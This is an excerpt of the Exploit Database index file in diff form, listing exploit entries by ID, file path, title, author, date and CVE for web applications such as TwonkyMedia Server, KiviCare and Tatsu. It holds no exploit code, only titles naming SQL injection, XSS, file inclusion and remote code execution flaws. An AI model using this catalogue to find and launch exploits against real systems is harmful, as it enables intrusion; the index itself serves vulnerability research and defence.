41927,exploits/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",webapps,multiple,,2017-04-25,2017-04-25,1,CVE-2017-5799;CVE-2017-5798,"File Inclusion (LFI/RFI)",,,,https://blogs.securiteam.com/index.php/archives/3087
10012,exploits/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,webapps,multiple,,2009-09-24,2016-10-24,1,OSVDB-64918;CVE-2009-5067,,,,,
49772,exploits/multiple/webapps/49772.py,"htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)",2021-04-15,nu11secur1ty,webapps,multiple,,2021-04-15,2021-04-15,0,CVE-2021-30637,,,,,
52259,exploits/multiple/webapps/52259.py,"Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation",2025-04-18,"Jun Takemura",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2024-11972,,,,,
50473,exploits/multiple/webapps/50473.txt,"i3 International Annexxus Cameras Ax-n 5.2.0 - Application Logic Flaw",2021-11-02,LiquidWorm,webapps,multiple,,2021-11-02,2021-11-02,0,,,,,,
32895,exploits/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - '/private/file_Management.ssi?PATH' Cross-Site Scripting",2009-04-09,"Henri Lindberg",webapps,multiple,,2009-04-09,2014-04-16,1,CVE-2009-1288;OSVDB-53658,,,,,https://www.securityfocus.com/bid/34447/info
32896,exploits/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",webapps,multiple,,2009-04-09,2014-04-16,1,CVE-2009-1290;OSVDB-53660,,,,,https://www.securityfocus.com/bid/34447/info
@ -12426,6 +12429,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48667,exploits/multiple/webapps/48667.rb,"Trend Micro Web Security Virtual Appliance 6.5 SP2 Patch 4 Build 1901 - Remote Code Execution (Metasploit)",2020-07-14,"Mehmet Ince",webapps,multiple,,2020-07-14,2020-07-14,0,CVE-2020-8605,,,,,
44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7171,,,,http://www.exploit-db.comTwonkyServer-8.5.exe,
44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,,2018-03-28,2018-03-28,0,CVE-2018-7203,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comTwonkyServer-8.5.exe,
52264,exploits/multiple/webapps/52264.py,"UJCMS 9.6.3 - User Enumeration via IDOR",2025-04-18,"Cyd Tseng",webapps,multiple,,2025-04-18,2025-04-18,0,CVE-2024-12483,,,,,
47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80,2019-08-01,2019-08-02,0,,"Cross-Site Scripting (XSS)",,,,
52139,exploits/multiple/webapps/52139.txt,"UNA CMS 14.0.0-RC - PHP Object Injection",2025-04-08,"Egidio Romano",webapps,multiple,,2025-04-08,2025-04-08,0,,,,,,
49150,exploits/multiple/webapps/49150.txt,"Under Construction Page with CPanel 1.0 - SQL injection",2020-12-02,"Mayur Parmar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
@ -20391,6 +20395,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32516,exploits/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php?i' SQL Injection",2014-03-26,"Eric Flokstra",webapps,php,80,2014-03-26,2014-03-26,1,CVE-2014-2531;OSVDB-104944,,,,,
27003,exploits/php/webapps/27003.txt,"InTouch 0.5.1 Alpha - User Variable SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-01,2013-07-22,1,CVE-2006-0088;OSVDB-22382,,,,,https://www.securityfocus.com/bid/16110/info
11481,exploits/php/webapps/11481.txt,"intuitive - 'form.php' SQL Injection",2010-02-17,AtT4CKxT3rR0r1ST,webapps,php,,2010-02-16,,1,,,,,,
52263,exploits/php/webapps/52263.py,"Inventio Lite 4 - SQL Injection",2025-04-18,pointedsec,webapps,php,,2025-04-18,2025-04-18,0,CVE-2024-44541,,,,,
37974,exploits/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injections",2012-10-26,G13,webapps,php,,2012-10-26,2015-08-26,1,,,,,,https://www.securityfocus.com/bid/56293/info
47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,,2019-09-06,2019-09-06,0,,,,,,
18022,exploits/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",webapps,php,,2011-10-23,2011-10-23,0,OSVDB-83422,,,,http://www.exploit-db.cominverseflow.zip,
@ -22511,6 +22516,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2979,exploits/php/webapps/2979.txt,"KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion",2006-12-22,mdx,webapps,php,,2006-12-21,2016-11-24,1,OSVDB-32444;CVE-2008-1635;CVE-2006-6764;OSVDB-32443;OSVDB-32442;CVE-2006-6763,,,,http://www.exploit-db.comkisgb-v5.0.0.zip,
3278,exploits/php/webapps/3278.txt,"Kisisel Site 2007 - 'tr' SQL Injection",2007-02-06,cl24zy,webapps,php,,2007-02-05,2016-09-27,1,OSVDB-35831;CVE-2007-0826,,,,http://www.exploit-db.comKisiselSite2007.zip,
32983,exploits/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph?sorter_value' SQL Injection",2014-04-22,chapp,webapps,php,80,2014-04-22,2014-04-22,0,OSVDB-106179;CVE-2014-3757,,,,http://www.exploit-db.comkitForm_0.43.zip,
52265,exploits/php/webapps/52265.py,"KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection",2025-04-18,samogod,webapps,php,,2025-04-18,2025-04-18,0,CVE-2024-11728,,,,,
8885,exploits/php/webapps/8885.pl,"Kjtechforce mailman b1 - 'dest' Blind SQL Injection",2009-06-05,YEnH4ckEr,webapps,php,,2009-06-04,,1,OSVDB-55303;CVE-2009-2164;OSVDB-55302,,,,,
8884,exploits/php/webapps/8884.txt,"Kjtechforce mailman b1 - Delete Row 'code' SQL Injection",2009-06-05,YEnH4ckEr,webapps,php,,2009-06-04,,1,OSVDB-55303;CVE-2009-2164;OSVDB-55302,,,,,
51859,exploits/php/webapps/51859.txt,"kk Star Ratings < 5.4.6 - Rating Tampering via Race Condition",2024-03-05,"Mohammad Reza Omrani",webapps,php,,2024-03-05,2024-03-05,0,,,,,,
@ -30908,6 +30914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
52260,exploits/php/webapps/52260.py,"Tatsu 3.3.11 - Unauthenticated RCE",2025-04-18,"Milad karimi",webapps,php,,2025-04-18,2025-04-18,0,CVE-2021-25094,,,,,
34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info
34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info
43543,exploits/php/webapps/43543.txt,"Taxi Booking Script 1.0 - Cross-site Scripting",2018-01-12,Tauco,webapps,php,,2018-01-12,2018-01-12,0,,,,,,
